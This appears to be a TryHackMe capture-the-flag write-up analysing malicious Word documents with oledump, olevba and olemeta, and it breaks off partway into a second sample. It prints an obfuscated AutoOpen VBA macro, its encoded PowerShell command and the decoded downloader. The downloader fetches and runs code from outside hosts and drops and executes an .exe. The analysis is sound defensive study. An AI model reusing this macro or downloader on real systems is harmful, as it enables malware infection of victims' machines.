tryhackme
// 2026-01-07
// ID: REF-Squid Game
Squid Game
└─$ ./oledump.py attacker1.doc
1: 114 '\x01CompObj'
2: 4096 '\x05DocumentSummaryInformation'
3: 4096 '\x05SummaryInformation'
4: 13859 '1Table'
5: 33430 'Data'
6: 365 'Macros/PROJECT'
7: 41 'Macros/PROJECTwm'
8: M 9852 'Macros/VBA/ThisDocument'
9: 5460 'Macros/VBA/_VBA_PROJECT'
10: 513 'Macros/VBA/dir'
11: 306 'MsoDataStore/ÇYÕXGNÎÕÃUKWÛÎIS2BKÍÐÐ==/Item'
12: 341 'MsoDataStore/ÇYÕXGNÎÕÃUKWÛÎIS2BKÍÐÐ==/Properties'
13: 4096 'WordDocument'
└─$ ./oledump.py attacker1.doc -s 8 -v
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
DBvbDlfxWGXm = WifblkBfDS + CBool(2243) + Len(ChrW(5 + 9) + ChrW(3)) + LenB(Trim("QHSiqJpWNfHbmnlvPbbP")) + Len(lZlRjJlQKnBntw)
lQbWzTrJtfhGiaS = pWNDRZbLZdGgl + CBool(5015) + Len(ChrW(1 + 1) + ChrW(2)) + LenB(Trim("XkBMzwHsSZswNPQMBDL")) + Len(SxZnBTiJkRBD)
tcZwqHFss = zTQlVkgJtJHVH + CBool(6903) + Len(ChrW(6 + 4) + ChrW(10)) + LenB(Trim("jDxtDndtrsCpNSNkxdJzhj")) + Len(RRdTnGKKsvm)
qDRjdabdvLvw = bDhgcvpVdcXNV + CBool(6163) + Len(ChrW(2 + 7) + ChrW(10)) + LenB(Trim("TisXGlccaikddjLpXZhn")) + Len(hVXaKsWdqGRalHZ)
TJgSBgQcFDq = xHtTibzqdL + CBool(6499) + Len(ChrW(2 + 7) + ChrW(1)) + LenB(Trim("iFvxjMCgcVJTWgGHG")) + Len(aQkXvbNzGWvh)
GWGjfdpJrxkg = PfFKPmwSmLwNT + CBool(2009) + Len(ChrW(4 + 7) + ChrW(6)) + LenB(Trim("kdHfDqVfHbpXcWBalpBj")) + Len(jwrLSVvTGmNgSNh)
CCvSPPJWbrLcHS = ""
fhjjZvgrrjq = mFGCJxVWBXjkl + CBool(1344) + Len(ChrW(8 + 10) + ChrW(3)) + LenB(Trim("bTZapLhFkwRKZPK")) + Len(SWsFlrFhBaHlgGg)
rjvFRbqzLtkzn = "" + ""
GnxslaCGaT = qqmRcwgpqlk + CBool(6041) + Len(ChrW(1 + 2) + ChrW(7)) + LenB(Trim("FvacXVVTqjKJxgdZjv")) + Len(QdRJwGnCHinZ)
xDgzRpPhghWrJL = NfHHmGCha + CBool(347) + Len(ChrW(3 + 10) + ChrW(10)) + LenB(Trim("QRgSjBfjthjpDkPxVpmDlb")) + Len(jWwMxvjadBtl)
tTRXtXmcgPrktFh = jdmzHVMkcVXcdMP + CBool(5783) + Len(ChrW(2 + 10) + ChrW(10)) + LenB(Trim("rnkhGPWpTBpGNcVlk")) + Len(irVHvSQQvHtd)
GhFdPWgpiqRj = CNLqTtpWDztqK + CBool(8793) + Len(ChrW(1 + 8) + ChrW(9)) + LenB(Trim("SXNhbQpQzmwVQlTmR")) + Len(RJaDmljLvpgjz)
LbZlvNQVaFtMi = vxPLFqFShhCqh + CBool(6141) + Len(ChrW(6 + 10) + ChrW(3)) + LenB(Trim("HahDZGNRJvHTcDKWPnnl")) + Len(zzfDDCMbPXrM)
SKKdjMpgJRQRK = "" + "" + Trim("")
ppBLnCMSjnSV = fPSQKCwZHRJ + CBool(6767) + Len(ChrW(6 + 9) + ChrW(3)) + LenB(Trim("cwZGhscSkqdkCDrjXnTS")) + Len(dmfMtsadBraSX)
pzSpxTNqbhCwW = DVsGkQJsLPQCcZqt + CBool(1865) + Len(ChrW(2 + 8) + ChrW(6)) + LenB(Trim("kZNsfRinpsRKqfNnF")) + Len(laLlSgkFRvtad)
JtnpWHTxSiiz = aCwfgTJDmbRQW + CBool(6925) + Len(ChrW(9 + 10) + ChrW(2)) + LenB(Trim("dDWBignPNFqBkrjqZlKiT")) + Len(chdsMqJKtKM)
QmrcNWGaSgCWz = lFQtNLhczCraQG + CBool(3980) + Len(ChrW(3 + 8) + ChrW(6)) + LenB(Trim("VKvjZliFSGsfCGKhSf")) + Len(KPgHQGtPqLTjphCn)
hdNxDVBxCTqQTpB = LTrim("")
nFtNXRVXbdFr = VPWjviWKBpJi + CBool(7052) + Len(ChrW(4 + 5) + ChrW(8)) + LenB(Trim("VBjjdfMslCcHNgbjJa")) + Len(nBDKwlZJvRMwRR)
gLkHkMNJpWGPiM = qcmPmHlmdWZqj + CBool(194) + Len(ChrW(7 + 5) + ChrW(1)) + LenB(Trim("ZTTXLrVxkWNKjjPrfCj")) + Len(crtmLCNraQLF)
zMzTwHmjJjndL = rDZKxGvDrNBJ + CBool(3433) + Len(ChrW(7 + 9) + ChrW(1)) + LenB(Trim("XaMLmrHxaSlqSXV")) + Len(ptlCjjDiKZ)
MNKsCVNXktg = hdJScJQgXmkm + CBool(2807) + Len(ChrW(7 + 5) + ChrW(9)) + LenB(Trim("RbRanmjXmLslKkZDlB")) + Len(WfkDLfGhqhWfhTN)
nHMgbFSzmgv = TBWHlimLMV + CBool(7832) + Len(ChrW(9 + 8) + ChrW(10)) + LenB(Trim("LsHkNQtMsMzltJgPQgfkR")) + Len(JHxRSZaqkRwtHi)
RJzJQGRzrc = ""
MCFxxPbQXmfGfnL = NsLSSSLGDfkwlt + CBool(5937) + Len(ChrW(6 + 9) + ChrW(3)) + LenB(Trim("SNpRVqvVcnPhX")) + Len(gJMqliiHCRNZQTc)
LdnJwgZjbnKqtaa = aBBZDWsTDPPnS + CBool(8258) + Len(ChrW(7 + 3) + ChrW(4)) + LenB(Trim("faLQCswVKLgWjmJKg")) + Len(KmpHBhFRwlKKMm)
FHvwQsqqdgbr = wtDvZMrVDatsPG + CBool(8557) + Len(ChrW(6 + 1) + ChrW(4)) + LenB(Trim("lDjJcSLdkCqGrRzwdlKHLVHn")) + Len(qlkRQRpBTtrm)
CiRSdXZHwV = NKxZvdzbPWxxN + CBool(1618) + Len(ChrW(10 + 4) + ChrW(4)) + LenB(Trim("pJRTVfBcDhxrcwKkPDbFt")) + Len(wKPlSJwvvXqW)
xVpspwsllZGqG = MpTBwVxXgdanm + CBool(5472) + Len(ChrW(1 + 3) + ChrW(5)) + LenB(Trim("KlilNHcTHfLXgQgkkRH")) + Len(tlWSglqmcgHrcq)
CWflqnrJbKVBj = RTrim("") + ""
kkCTbdBcJnsGw = sFdLzbirFimt + CBool(6092) + Len(ChrW(6 + 7) + ChrW(8)) + LenB(Trim("cvXVCvgQfdqkdZkQwadmPMg")) + Len(acSnFqKQZJkgq)
cGvRqkvVFLFzsK = mChrRcSmQTlzbtd + CBool(476) + Len(ChrW(5 + 5) + ChrW(9)) + LenB(Trim("iXZiMssZcgzrHZrcFvVtk")) + Len(iixsSRWTqT)
QwXhZsRSjsaLm = FracTilLgHn + CBool(590) + Len(ChrW(4 + 8) + ChrW(7)) + LenB(Trim("MNhhbMhpCpvcwlCCWRgfhFc")) + Len(igrKGJjKXXfr)
Set pNHbvwXpnbZvS = Shapes(Trim("h9mkae7"))
dWDHaNGFDcG = iGKRcdzDwMZzqlWN + CBool(2417) + Len(ChrW(5 + 3) + ChrW(4)) + LenB(Trim("hDNlqMjmcDXrwkrDwq")) + Len(mQhXDqaHVLMab)
zVRvpZVSlZP = jxrRCZTpPSjqG + CBool(747) + Len(ChrW(9 + 2) + ChrW(3)) + LenB(Trim("wnkLGNvnwtBPGKxVMs")) + Len(HmbfaFbBPKWJstpW)
VBA.Shell# "CmD /C " + Trim(rjvFRbqzLtkzn) + SKKdjMpgJRQRK + Trim(Replace(pNHbvwXpnbZvS.AlternativeText + "", "[", "A")) + hdNxDVBxCTqQTpB + RJzJQGRzrc + CWflqnrJbKVBj, CInt(351 * 2 + -702)
lFbSwGcXvLj = ZcCmWkkqqB + CBool(3868) + Len(ChrW(10 + 10) + ChrW(7)) + LenB(Trim("GpsfXGHdXPiPBQWm")) + Len(CxtsBzHdKBGmb)
gQVFVamfZLZ = GgRgBdCqvLXk + CBool(260) + Len(ChrW(4 + 5) + ChrW(3)) + LenB(Trim("pSdvPiVsNHZWVbr")) + Len(ZxkaZVpVviNG)
XXDBdSGLmXrT = kkfQTPTJpjjs + CBool(9051) + Len(ChrW(4 + 6) + ChrW(1)) + LenB(Trim("RkTPBgXDhBTgMXtKSb")) + Len(bvfFxpHJWlX)
rhfWlBhJNxhXd = DbfBblNVjZrSd + CBool(7064) + Len(ChrW(10 + 10) + ChrW(6)) + LenB(Trim("MwstcPJvhangVNZapdZ")) + Len(jfPdPngPqkfl)
PrBtRSHfsVF = PDvGhnzPcxhD + CBool(1483) + Len(ChrW(5 + 8) + ChrW(1)) + LenB(Trim("tvjtZQfzHdgNNRHZqilSN")) + Len(JJLiShTtqxhXr)
fXsWigQMrcFc = mxpJbmSSQ + CBool(5222) + Len(ChrW(10 + 8) + ChrW(10)) + LenB(Trim("rdlmccJkfVhXRccQBM")) + Len(RkVtwCRbFKwknG)
dgDaZRkBlQp = MvZcVWwwaGt + CBool(5297) + Len(ChrW(4 + 6) + ChrW(5)) + LenB(Trim("VgBdpkxSLXdGbgLKh")) + Len(qNJnfcLpkQXcp)
wdTqKxXzraCs = mkaDKJfCfVRm + CBool(8379) + Len(ChrW(1 + 10) + ChrW(5)) + LenB(Trim("klTWfaFrtslwGtgadMj")) + Len(GvivfXcsHC)
End Sub
VBA.Shell# "CmD /C " + Trim(rjvFRbqzLtkzn) + SKKdjMpgJRQRK + Trim(Replace(pNHbvwXpnbZvS.AlternativeText + "", "[", "A")) + hdNxDVBxCTqQTpB + RJzJQGRzrc + CWflqnrJbKVBj, CInt(351 * 2 + -702)
lFbSwGcXvLj = ZcCmWkkqqB + CBool(3868) + Len(ChrW(10 + 10) + ChrW(7)) + LenB(Trim("GpsfXGHdXPiPBQWm")) + Len(CxtsBzHdKBGmb)
gQVFVamfZLZ = GgRgBdCqvLXk + CBool(260) + Len(ChrW(4 + 5) + ChrW(3)) + LenB(Trim("pSdvPiVsNHZWVbr")) + Len(ZxkaZVpVviNG)
└─$ ./oledump.py attacker1.doc -s 4 -S
[Content_Types].xml
_rels/.rels
theme/theme/themeManager.xml
sQ}#
theme/theme/theme1.xml
$O})
Xp90
+PHI|
9xu5
fs+W
VF7H
q=.
8}d-
qyI@
j!Q_
jyV`
|PZ+
O&x$
A8>v
;EUC
*~P(5
/,EE\}
theme/theme/_rels/themeManager.xml.rels
6?$Q
K(M&$R(.1
[Content_Types].xmlPK
_rels/.relsPK
theme/theme/themeManager.xmlPK
theme/theme/theme1.xmlPK
theme/theme/_rels/themeManager.xml.relsPK
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
Normal
Default Paragraph Font
Table Normal
No List
h9mkae7
P^O^W^E^R^S^H^E^L^L ^-^N^o^P^r^o^f^i^l^e^ -^E^x^e^cutionPolicy B^^^yp^ass -encodedcommand J[Bp[G4[cwB0[GE[bgBj[GU[I[[9[C[[WwBT[Hk[cwB0[GU[bQ[u[EE[YwB0[Gk[dgBh[HQ[bwBy[F0[Og[6[EM[cgBl[GE[d[Bl[Ek[bgBz[HQ[YQBu[GM[ZQ[o[CI[UwB5[HM[d[Bl[G0[LgBO[GU[d[[u[Fc[ZQBi[EM[b[Bp[GU[bgB0[CI[KQ[7[[0[Cg[k[G0[ZQB0[Gg[bwBk[C[[PQ[g[Fs[UwB5[HM[d[Bl[G0[LgBO[GU[d[[u[Fc[ZQBi[EM[b[Bp[GU[bgB0[F0[LgBH[GU[d[BN[GU[d[Bo[G8[Z[Bz[Cg[KQ[7[[0[CgBm[G8[cgBl[GE[YwBo[Cg[J[Bt[C[[aQBu[C[[J[Bt[GU[d[Bo[G8[Z[[p[Hs[DQ[K[[0[Cg[g[C[[aQBm[Cg[J[Bt[C4[TgBh[G0[ZQ[g[C0[ZQBx[C[[IgBE[G8[dwBu[Gw[bwBh[GQ[UwB0[HI[aQBu[Gc[Ig[p[Hs[DQ[K[C[[I[[g[C[[d[By[Hk[ew[N[[o[I[[g[C[[I[[g[CQ[dQBy[Gk[I[[9[C[[TgBl[Hc[LQBP[GI[agBl[GM[d[[g[FM[eQBz[HQ[ZQBt[C4[VQBy[Gk[K[[i[Gg[d[B0[H[[Og[v[C8[MQ[3[DY[Lg[z[DI[Lg[z[DU[Lg[x[DY[Lw[3[D[[N[Bl[C4[c[Bo[H[[Ig[p[[0[Cg[g[C[[I[[g[C[[SQBF[Fg[K[[k[G0[LgBJ[G4[dgBv[Gs[ZQ[o[CQ[aQBu[HM[d[Bh[G4[YwBl[Cw[I[[o[CQ[dQBy[Gk[KQ[p[Ck[Ow[N[[o[I[[g[C[[I[B9[GM[YQB0[GM[a[B7[H0[DQ[K[[0[Cg[g[C[[fQ[N[[o[DQ[K[C[[I[Bp[GY[K[[k[G0[LgBO[GE[bQBl[C[[LQBl[HE[I[[i[EQ[bwB3[G4[b[Bv[GE[Z[BE[GE[d[Bh[CI[KQB7[[0[Cg[g[C[[I[[g[C[[d[By[Hk[ew[N[[o[I[[g[C[[I[[g[CQ[dQBy[Gk[I[[9[C[[TgBl[Hc[LQBP[GI[agBl[GM[d[[g[FM[eQBz[HQ[ZQBt[C4[VQBy[Gk[K[[i[Gg[d[B0[H[[Og[v[C8[ZgBw[GU[d[By[GE[YQBy[GQ[ZQBs[Gw[YQ[u[GI[YQBu[GQ[LwB4[GE[c[Bf[DE[M[[y[GI[LQBB[Fo[MQ[v[Dc[M[[0[GU[LgBw[Gg[c[[/[Gw[PQBs[Gk[d[B0[GU[bg[0[C4[ZwBh[HM[Ig[p[[0[Cg[g[C[[I[[g[C[[J[By[GU[cwBw[G8[bgBz[GU[I[[9[C[[J[Bt[C4[SQBu[HY[bwBr[GU[K[[k[Gk[bgBz[HQ[YQBu[GM[ZQ[s[C[[K[[k[HU[cgBp[Ck[KQ[7[[0[Cg[N[[o[I[[g[C[[I[[g[CQ[c[Bh[HQ[a[[g[D0[I[Bb[FM[eQBz[HQ[ZQBt[C4[RQBu[HY[aQBy[G8[bgBt[GU[bgB0[F0[Og[6[Ec[ZQB0[EY[bwBs[GQ[ZQBy[F[[YQB0[Gg[K[[i[EM[bwBt[G0[bwBu[EE[c[Bw[Gw[aQBj[GE[d[Bp[G8[bgBE[GE[d[Bh[CI[KQ[g[Cs[I[[i[Fw[X[BR[GQ[WgBH[F[[LgBl[Hg[ZQ[i[Ds[DQ[K[C[[I[[g[C[[I[Bb[FM[eQBz[HQ[ZQBt[C4[SQBP[C4[RgBp[Gw[ZQBd[Do[OgBX[HI[aQB0[GU[QQBs[Gw[QgB5[HQ[ZQBz[Cg[J[Bw[GE[d[Bo[Cw[I[[k[HI[ZQBz[H[[bwBu[HM[ZQ[p[Ds[DQ[K[[0[Cg[g[C[[I[[g[C[[J[Bj[Gw[cwBp[GQ[I[[9[C[[TgBl[Hc[LQBP[GI[agBl[GM[d[[g[Ec[dQBp[GQ[I[[n[EM[M[[4[EE[RgBE[Dk[M[[t[EY[MgBB[DE[LQ[x[DE[R[[x[C0[O[[0[DU[NQ[t[D[[M[BB[D[[Qw[5[DE[Rg[z[Dg[O[[w[Cc[DQ[K[C[[I[[g[C[[I[[k[HQ[eQBw[GU[I[[9[C[[WwBU[Hk[c[Bl[F0[Og[6[Ec[ZQB0[FQ[eQBw[GU[RgBy[G8[bQBD[Ew[UwBJ[EQ[K[[k[GM[b[Bz[Gk[Z[[p[[0[Cg[g[C[[I[[g[C[[J[Bv[GI[agBl[GM[d[[g[D0[I[Bb[EE[YwB0[Gk[dgBh[HQ[bwBy[F0[Og[6[EM[cgBl[GE[d[Bl[Ek[bgBz[HQ[YQBu[GM[ZQ[o[CQ[d[B5[H[[ZQ[p[[0[Cg[g[C[[I[[g[C[[J[Bv[GI[agBl[GM[d[[u[EQ[bwBj[HU[bQBl[G4[d[[u[EE[c[Bw[Gw[aQBj[GE[d[Bp[G8[bg[u[FM[a[Bl[Gw[b[BF[Hg[ZQBj[HU[d[Bl[Cg[J[Bw[GE[d[Bo[Cw[J[Bu[HU[b[[s[C[[J[Bu[HU[b[[s[C[[J[Bu[HU[b[[s[D[[KQ[N[[o[DQ[K[C[[I[[g[C[[I[B9[GM[YQB0[GM[a[B7[H0[DQ[K[C[[I[[g[C[[I[[N[[o[I[[g[H0[DQ[K[H0[DQ[K[[0[CgBF[Hg[aQB0[Ds[DQ[K[[0[Cg[=
ez97260_a
Ruben__702314
ez20760_a
Zora__315900
ez74530_a
Jarrod__619003
ez46492_a
Floyd__148063
ez80718_a
Taryn__106385
Project.ThisDocument.AutoOpen
PROJECT.THISDOCUMENT.AUTOOPEN
Unknown
Times New Roman
Symbol
Arial
Calibri
Cambria Math
Networked multi-state projection
West Virginia Samanta
213-446-1757 x7135
Windows
J[Bp[G4[cwB0[GE[bgBj[GU[I[[9[C[[WwBT[Hk[cwB0[GU[bQ[u[EE[YwB0[Gk[dgBh[HQ[bwBy[F0[Og[6[EM[cgBl[GE[d[Bl[Ek[bgBz[HQ[YQBu[GM[ZQ[o[CI[UwB5[HM[d[Bl[G0[LgBO[GU[d[[u[Fc[ZQBi[EM[b[Bp[GU[bgB0[CI[KQ[7[[0[Cg[k[G0[ZQB0[Gg[bwBk[C[[PQ[g[Fs[UwB5[HM[d[Bl[G0[LgBO[GU[d[[u[Fc[ZQBi[EM[b[Bp[GU[bgB0[F0[LgBH[GU[d[BN[GU[d[Bo[G8[Z[Bz[Cg[KQ[7[[0[CgBm[G8[cgBl[GE[YwBo[Cg[J[Bt[C[[aQBu[C[[J[Bt[GU[d[Bo[G8[Z[[p[Hs[DQ[K[[0[Cg[g[C[[aQBm[Cg[J[Bt[C4[TgBh[G0[ZQ[g[C0[ZQBx[C[[IgBE[G8[dwBu[Gw[bwBh[GQ[UwB0[HI[aQBu[Gc[Ig[p[Hs[DQ[K[C[[I[[g[C[[d[By[Hk[ew[N[[o[I[[g[C[[I[[g[CQ[dQBy[Gk[I[[9[C[[TgBl[Hc[LQBP[GI[agBl[GM[d[[g[FM[eQBz[HQ[ZQBt[C4[VQBy[Gk[K[[i[Gg[d[B0[H[[Og[v[C8[MQ[3[DY[Lg[z[DI[Lg[z[DU[Lg[x[DY[Lw[3[D[[N[Bl[C4[c[Bo[H[[Ig[p[[0[Cg[g[C[[I[[g[C[[SQBF[Fg[K[[k[G0[LgBJ[G4[dgBv[Gs[ZQ[o[CQ[aQBu[HM[d[Bh[G4[YwBl[Cw[I[[o[CQ[dQBy[Gk[KQ[p[Ck[Ow[N[[o[I[[g[C[[I[B9[GM[YQB0[GM[a[B7[H0[DQ[K[[0[Cg[g[C[[fQ[N[[o[DQ[K[C[[I[Bp[GY[K[[k[G0[LgBO[GE[bQBl[C[[LQBl[HE[I[[i[EQ[bwB3[G4[b[Bv[GE[Z[BE[GE[d[Bh[CI[KQB7[[0[Cg[g[C[[I[[g[C[[d[By[Hk[ew[N[[o[I[[g[C[[I[[g[CQ[dQBy[Gk[I[[9[C[[TgBl[Hc[LQBP[GI[agBl[GM[d[[g[FM[eQBz[HQ[ZQBt[C4[VQBy[Gk[K[[i[Gg[d[B0[H[[Og[v[C8[ZgBw[GU[d[By[GE[YQBy[GQ[ZQBs[Gw[YQ[u[GI[YQBu[GQ[LwB4[GE[c[Bf[DE[M[[y[GI[LQBB[Fo[MQ[v[Dc[M[[0[GU[LgBw[Gg[c[[/[Gw[PQBs[Gk[d[B0[GU[bg[0[C4[ZwBh[HM[Ig[p[[0[Cg[g[C[[I[[g[C[[J[By[GU[cwBw[G8[bgBz[GU[I[[9[C[[J[Bt[C4[SQBu[HY[bwBr[GU[K[[k[Gk[bgBz[HQ[YQBu[GM[ZQ[s[C[[K[[k[HU[cgBp[Ck[KQ[7[[0[Cg[N[[o[I[[g[C[[I[[g[CQ[c[Bh[HQ[a[[g[D0[I[Bb[FM[eQBz[HQ[ZQBt[C4[RQBu[HY[aQBy[G8[bgBt[GU[bgB0[F0[Og[6[Ec[ZQB0[EY[bwBs[GQ[ZQBy[F[[YQB0[Gg[K[[i[EM[bwBt[G0[bwBu[EE[c[Bw[Gw[aQBj[GE[d[Bp[G8[bgBE[GE[d[Bh[CI[KQ[g[Cs[I[[i[Fw[X[BR[GQ[WgBH[F[[LgBl[Hg[ZQ[i[Ds[DQ[K[C[[I[[g[C[[I[Bb[FM[eQBz[HQ[ZQBt[C4[SQBP[C4[RgBp[Gw[ZQBd[Do[OgBX[HI[aQB0[GU[QQBs[Gw[QgB5[HQ[ZQBz[Cg[J[Bw[GE[d[Bo[Cw[I[[k[HI[ZQBz[H[[bwBu[HM[ZQ[p[Ds[DQ[K[[0[Cg[g[C[[I[[g[C[[J[Bj[Gw[cwBp[GQ[I[[9[C[[TgBl[Hc[LQBP[GI[agBl[GM[d[[g[Ec[dQBp[GQ[I[[n[EM[M[[4[EE[RgBE[Dk[M[[t[EY[MgBB[DE[LQ[x[DE[R[[x[C0[O[[0[DU[NQ[t[D[[M[BB[D[[Qw[5[DE[Rg[z[Dg[O[[w[Cc[DQ[K[C[[I[[g[C[[I[[k[HQ[eQBw[GU[I[[9[C[[WwBU[Hk[c[Bl[F0[Og[6[Ec[ZQB0[FQ[eQBw[GU[RgBy[G8[bQBD[Ew[UwBJ[EQ[K[[k[GM[b[Bz[Gk[Z[[p[[0[Cg[g[C[[I[[g[C[[J[Bv[GI[agBl[GM[d[[g[D0[I[Bb[EE[YwB0[Gk[dgBh[HQ[bwBy[F0[Og[6[EM[cgBl[GE[d[Bl[Ek[bgBz[HQ[YQBu[GM[ZQ[o[CQ[d[B5[H[[ZQ[p[[0[Cg[g[C[[I[[g[C[[J[Bv[GI[agBl[GM[d[[u[EQ[bwBj[HU[bQBl[G4[d[[u[EE[c[Bw[Gw[aQBj[GE[d[Bp[G8[bg[u[FM[a[Bl[Gw[b[BF[Hg[ZQBj[HU[d[Bl[Cg[J[Bw[GE[d[Bo[Cw[J[Bu[HU[b[[s[C[[J[Bu[HU[b[[s[C[[J[Bu[HU[b[[s[D[[KQ[N[[o[DQ[K[C[[I[[g[C[[I[B9[GM[YQB0[GM[a[B7[H0[DQ[K[C[[I[[g[C[[I[[N[[o[I[[g[H0[DQ[K[H0[DQ[K[[0[CgBF[Hg[aQB0[Ds[DQ[K[[0[Cg[=
In CyberChef, paste the Powershell command in the input section, then add the following to the recipe:
- Replace - simple string,
[withA - From Base64
- Remove null bytes
This shows us the de-obfuscated script:
$instance = [System.Activator]::CreateInstance("System.Net.WebClient");
$method = [System.Net.WebClient].GetMethods();
foreach($m in $method){
if($m.Name -eq "DownloadString"){
try{
$uri = New-Object System.Uri("http://176.32.35.16/704e.php")
IEX($m.Invoke($instance, ($uri)));
}catch{}
}
if($m.Name -eq "DownloadData"){
try{
$uri = New-Object System.Uri("http://fpetraardella.band/xap_102b-AZ1/704e.php?l=litten4.gas")
$response = $m.Invoke($instance, ($uri));
$path = [System.Environment]::GetFolderPath("CommonApplicationData") + "\\QdZGP.exe";
[System.IO.File]::WriteAllBytes($path, $response);
$clsid = New-Object Guid 'C08AFD90-F2A1-11D1-8455-00A0C91F3880'
$type = [Type]::GetTypeFromCLSID($clsid)
$object = [Activator]::CreateInstance($type)
$object.Document.Application.ShellExecute($path,$nul, $nul, $nul,0)
}catch{}
}
}
Exit;
olevba attacker1.doc
olevba 0.60.2 on Python 3.13.7 - http://decalage.info/python/oletools
===============================================================================
FILE: attacker1.doc
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls
in file: attacker1.doc - OLE stream: 'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Sub AutoOpen()
End Sub
+----------+--------------------+---------------------------------------------+
|Type |Keyword |Description |
+----------+--------------------+---------------------------------------------+
|AutoExec |AutoOpen |Runs when the Word document is opened |
|Suspicious|Shell |May run an executable file or a system |
| | |command |
|Suspicious|ChrW |May attempt to obfuscate specific strings |
| | |(use option --deobf to deobfuscate) |
|Suspicious|Base64 Strings |Base64-encoded strings were detected, may be |
| | |used to obfuscate strings (option --decode to|
| | |see all) |
+----------+--------------------+---------------------------------------------+
└─$ olemeta attacker1.doc
olemeta 0.54 - http://decalage.info/python/oletools
THIS IS WORK IN PROGRESS - Check updates regularly!
Please report any issue at https://github.com/decalage2/oletools/issues
===============================================================================
FILE: attacker1.doc
Properties from the SummaryInformation stream:
+---------------------+------------------------------+
|Property |Value |
+---------------------+------------------------------+
|codepage |1251 |
|title |Networked multi-state |
| |projection |
|subject |West Virginia Samanta |
|author |213-446-1757 x7135 |
|keywords | |
|comments |Re-contextualized radical |
| |service-desk |
|template |Normal |
|last_saved_by | Windows |
|revision_number |11 |
|total_edit_time |180 |
|create_time |2018-04-19 18:59:00 |
|last_saved_time |2019-02-07 23:45:00 |
|num_pages |1 |
|num_words |1 |
|num_chars |7 |
|creating_application |Microsoft Office Word |
|security |0 |
+---------------------+------------------------------+
Properties from the DocumentSummaryInformation stream:
+---------------------+------------------------------+
|Property |Value |
+---------------------+------------------------------+
|codepage_doc |1251 |
|bytes |23552 |
|lines |1 |
|paragraphs |1 |
|scale_crop |False |
|heading_pairs |[b'Title', 1, b'\xcd\xe0\xe7\x|
| |e2\xe0\xed\xe8\xe5', 1] |
|titles_of_parts |[b'', b''] |
|manager |Mr. Granville McGlynn |
|company |Grady-Adams Rusty McGlynn |
|links_dirty |False |
|chars_with_spaces |7 |
|shared_doc |False |
|hlinks_changed |False |
|version |1048576 |
+---------------------+------------------------------+
Attacker - 02
└─$ ./oledump.py attacker2.doc
1: 114 '\x01CompObj'
2: 4096 '\x05DocumentSummaryInformation'
3: 4096 '\x05SummaryInformation'
4: 7427 '1Table'
5: 63641 'Data'
6: 97 'Macros/Form/\x01CompObj'
7: 283 'Macros/Form/\x03VBFrame'
8: 63528 'Macros/Form/f'
9: 2220 'Macros/Form/o'
10: 566 'Macros/PROJECT'
11: 92 'Macros/PROJECTwm'
12: M 6655 'Macros/VBA/Form'
13: M 15671 'Macros/VBA/Module1'
14: M 1593 'Macros/VBA/ThisDocument'
15: 42465 'Macros/VBA/_VBA_PROJECT'
16: M 2724 'Macros/VBA/bxh'
17: 1226 'Macros/VBA/dir'
18: 4096 'WordDocument'
└─$ ./oledump.py attacker2.doc -i
1: 114 '\x01CompObj'
2: 4096 '\x05DocumentSummaryInformation'
3: 4096 '\x05SummaryInformation'
4: 7427 '1Table'
5: 63641 'Data'
6: 97 'Macros/Form/\x01CompObj'
7: 283 'Macros/Form/\x03VBFrame'
8: 63528 'Macros/Form/f'
9: 2220 'Macros/Form/o'
10: 566 'Macros/PROJECT'
11: 92 'Macros/PROJECTwm'
12: M 6655 4978+1677 'Macros/VBA/Form'
13: M 15671 13867+1804 'Macros/VBA/Module1'
14: M 1593 1396+197 'Macros/VBA/ThisDocument'
15: 42465 'Macros/VBA/_VBA_PROJECT'
16: M 2724 2397+327 'Macros/VBA/bxh'
17: 1226 'Macros/VBA/dir'
18: 4096 'WordDocument'
└─$ ./oledump.py attacker2.doc -s a -v
Attribute VB_Name = "Form"
Attribute VB_Base = "0{6BC9B63B-B929-462A-868D-366CD3790D09}{4A072285-D56F-4077-875E-A6D43D6C1272}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Const Dominios As String = "AERO BIZ COM COOP EDU GOV INFO INT MIL MUSEUM NAME NET ORG PRO " & _
"AC AD AE AF AG AI AL AM AN AO AQ AR AS AT AU AW AZ BA BB BD " & _
"BE BF BG BH BI BJ BM BN BO BR BS BT BV BW BY BZ CA CC CD CF " & _
"CG CH CI CK CL CM CN CO CR CU CV CX CY CZ DE DJ DK DM DO DZ " & _
"EC EE EG EH ER ES ET FI FJ FK FM FO FR GA GD GE GF GG GH GI " & _
"GL GM GN GP GQ GR GS GT GU GW GY HK HM HN HR HT HU ID IE IL " & _
"IM IN IO IQ IR IS IT JE JM JO JP KE KG KH KI KM KN KP KR KW " & _
"KY KZ LA LB LC LI LK LR LS LT LU LV LY MA MC MD MG MH MK ML " & _
"MM MN MO MP MQ MR MS MT MU MV MW MX MY MZ NA NC NE NF NG NI " & _
"NL NO NP NR NU NZ OM PA PE PF PG PH PK PL PM PN PR PS PT PW " & _
"PY QA RE RO RU RW SA SB SC SD SE SG SH SI SJ SK SL SM SN SO " & _
"SR ST SV SY SZ TC TD TF TG TH TJ TK TM TN TO TP TR TT TV TW " & _
"TZ UA UG UK UM US UY UZ VA VC VE VG VI VN VU WF WS YE YT YU " & _
"ZA ZM ZW"
Public Function IsEmail(ByVal Email As String) As Boolean
Dim w As Integer
Dim sLetra As String
Dim sSplit() As String
On Error Resume Next
If Len(Email) > 0 Then
If UBound(Split(Email, "@")) <> 1 Or InStr(Email, ".") = 0 Then
Exit Function
End If
If left$(Email, 1) = "@" Or Mid$(Email, Len(Email), 1) = "@" Or InStr(Email, "@.") Or InStr(Email, ".@") Then
Exit Function
End If
